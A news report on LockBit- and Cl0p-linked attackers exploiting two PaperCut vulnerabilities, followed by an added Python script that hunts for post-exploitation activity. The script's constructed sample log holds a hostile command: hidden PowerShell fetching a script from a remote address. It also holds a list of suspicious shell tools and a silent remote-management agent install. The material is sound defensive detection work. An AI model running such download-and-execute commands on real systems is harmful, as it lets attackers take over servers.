Critical vulnerabilities in the print management software PaperCut are being exploited by criminals linked to the notorious Russian ransomware gangs LockBit and Cl0p, Microsoft security researchers have said. PaperCut has released patches for the vulnerabilities and is urging customers to install them as soon as they can.
The attacks began on 16 April, when cybercriminals were detected using the flaws to install remote management software on compromised servers. PaperCut's products are used by large enterprises, healthcare and education institutions and local government agencies. According to its website, the company serves more than 100 million users at over 70,000 organisations worldwide.
PaperCut bugs exploited by LockBit and Cl0p
Two critical vulnerabilities in PaperCut's products, tracked as CVE-2023-27350 and CVE-2023-27351, are being used by ransomware gangs to move laterally through victims' networks and to harvest information that can be used to launch follow-on social engineering and phishing attacks.
PaperCut released patches for these flaws at the end of March. On 19 April, however, the company issued an advisory warning that the flaws were being heavily exploited in the wild.
Security company Huntress then published evidence that attackers are exploiting the vulnerabilities to install the remote management tools Atera and Syncro on unpatched servers. The company has identified around 1,800 internet-facing PaperCut servers exposed to these attacks.
The same report found that around 90% of Windows hosts running PaperCut software remain unpatched and therefore vulnerable to these attacks.
Microsoft reveals links to ransomware gangs
Late on Wednesday, Microsoft named the criminals it believes are exploiting these vulnerabilities in the wild. The attacks have been carried out by the group it tracks as Lace Tempest, which has used them to deliver Cl0p ransomware, according to tweets from Microsoft's Threat Intelligence team.
Lace Tempest is a Cl0p ransomware affiliate that has been observed using various exploits and open-source tools to conduct reconnaissance and steal credentials.
The gang has also been observed deploying LockBit ransomware. “More threat actors could follow suit,” Microsoft warns. “It’s critical for organisations to follow PaperCut’s recommendation to upgrade applications and servers.”
How do the vulnerabilities work?
The first bug, CVE-2023-27350, has a CVSS score of 9.8, making it a critical flaw. PaperCut describes it as a vulnerability that “allows for an unauthenticated attacker to get remote code execution (RCE) on a PaperCut Application Server. This could be done remotely and without the need to log in”. Because no credentials are required, any attacker who can reach the server's web interface can run code on it.
An attacker who already has a basic foothold in a network, for example as a guest user on an employee laptop, can use this bug to pivot to a far more powerful position in the business, explains a report by security company Sophos: the print server is a central, trusted system, and code execution on it is a strong base for lateral movement.
PaperCut describes the second bug, CVE-2023-27351, which has a CVSS score of 8.2, as a flaw that “allows for an unauthenticated attacker to potentially pull information about a user stored within PaperCut MF or NG – including usernames, full names, email addresses, office/department info and any card numbers associated with the user”.
The second bug therefore lets attackers harvest user data from a server without logging in, exactly the kind of information that feeds the phishing and social engineering attacks described above. Details of how to update PaperCut software are available in PaperCut's advisory.
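As an added illustration (it is not code from the article, PaperCut, Huntress or Microsoft), the following Python sketch shows how a defender might hunt for the post-exploitation behaviour the reports describe: the PaperCut Application Server process spawning a shell or installer, and Atera or Syncro agents being installed on the print server. The process name pc-app.exe for the Windows Application Server service, the rule names, the 192.0.2.10 address and the Sysmon-style JSON records are assumptions and constructed sample data, not details taken from the page.

```python
"""Detection sketch for PaperCut post-exploitation activity.

Assumptions (not stated in the article): the Windows service binary of the
PaperCut Application Server is named pc-app.exe, and the log lines below are
constructed, Sysmon-style process-creation records (Event ID 1), one JSON
object per line. Adjust the names to match your own telemetry.
"""
import json
import ntpath

# Assumed process name of the PaperCut MF/NG Application Server on Windows.
PAPERCUT_SERVER = {"pc-app.exe"}

# Children a print server's service process has no business launching.
SUSPICIOUS_CHILDREN = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
    "msiexec.exe", "rundll32.exe", "regsvr32.exe", "curl.exe", "certutil.exe",
}

# Markers for the remote-management tooling named in the Huntress report.
RMM_MARKERS = ("atera", "syncro")


def basename(image: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return ntpath.basename(image).lower()


def evaluate(event: dict) -> list:
    """Return the names of every rule that matches one process-creation event."""
    hits = []
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "").lower()

    # Rule 1: the PaperCut server spawned a shell, script host or installer.
    if parent in PAPERCUT_SERVER and child in SUSPICIOUS_CHILDREN:
        hits.append("papercut_spawns_shell_or_installer")
    # Rule 2: the PaperCut server launched something referencing Atera/Syncro.
    if parent in PAPERCUT_SERVER and any(m in cmdline for m in RMM_MARKERS):
        hits.append("papercut_launches_rmm_installer")
    # Rule 3: an RMM agent installed via msiexec from any parent still
    # deserves a look on a print server that should not be running one.
    if child == "msiexec.exe" and any(m in cmdline for m in RMM_MARKERS):
        hits.append("rmm_installer_via_msiexec")
    return hits


def scan(lines):
    """Run the rules over JSON lines; return [(line_no, [rule, ...]), ...] for hits."""
    findings = []
    for n, line in enumerate(lines, 1):
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed records instead of aborting the hunt
        hits = evaluate(event)
        if hits:
            findings.append((n, hits))
    return findings


# Constructed sample log: records 1 and 3 should fire, record 2 is benign noise.
SAMPLE_LOG = r"""
{"EventID":1,"ParentImage":"C:\\Program Files\\PaperCut MF\\server\\bin\\win\\pc-app.exe","Image":"C:\\Windows\\System32\\cmd.exe","CommandLine":"cmd.exe /c powershell -nop -w hidden -ep bypass -c iwr http://192.0.2.10/a.ps1"}
{"EventID":1,"ParentImage":"C:\\Program Files\\PaperCut MF\\server\\bin\\win\\pc-app.exe","Image":"C:\\Windows\\System32\\conhost.exe","CommandLine":"\\??\\C:\\Windows\\system32\\conhost.exe 0x4"}
{"EventID":1,"ParentImage":"C:\\Windows\\System32\\cmd.exe","Image":"C:\\Windows\\System32\\msiexec.exe","CommandLine":"msiexec.exe /i C:\\Windows\\Temp\\AteraAgent.msi /qn"}
"""

if __name__ == "__main__":
    for line_no, rules in scan(SAMPLE_LOG.splitlines()):
        print(f"record {line_no}: {', '.join(rules)}")
```

Rule 1 is the high-signal one: a Java-based print server has no legitimate reason to spawn cmd.exe or msiexec.exe, so it will fire on almost any RCE against the Application Server regardless of which payload the attacker chooses, while rules 2 and 3 catch the specific tooling the current campaign has been seen to drop.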